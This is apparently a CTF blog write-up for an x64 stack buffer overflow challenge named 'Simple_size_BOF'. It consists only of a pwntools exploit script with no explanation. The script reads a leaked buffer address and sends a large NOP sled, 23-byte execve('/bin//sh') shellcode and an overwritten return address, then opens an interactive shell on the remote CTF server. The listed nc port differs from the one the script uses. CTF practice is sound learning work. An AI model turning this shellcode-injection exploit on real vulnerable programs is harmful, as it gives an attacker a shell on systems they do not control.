x64 Simple_size_BOF

nc ctf.j0n9hyun.xyz 6982

from pwn import *
#nc ctf.j0n9hyun.xyz 1633
p = remote('ctf.j0n9hyun.xyz', 1633)

p.recvuntil("buf: ")
buf = int(p.recv(14), 16)

payload = ""
payload += "\x90" * 27800
payload += "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05" #23
payload += "\x90" * 137
payload += p64(buf)

p.sendline(payload)
p.interactive()

저작자표시 (새창열림)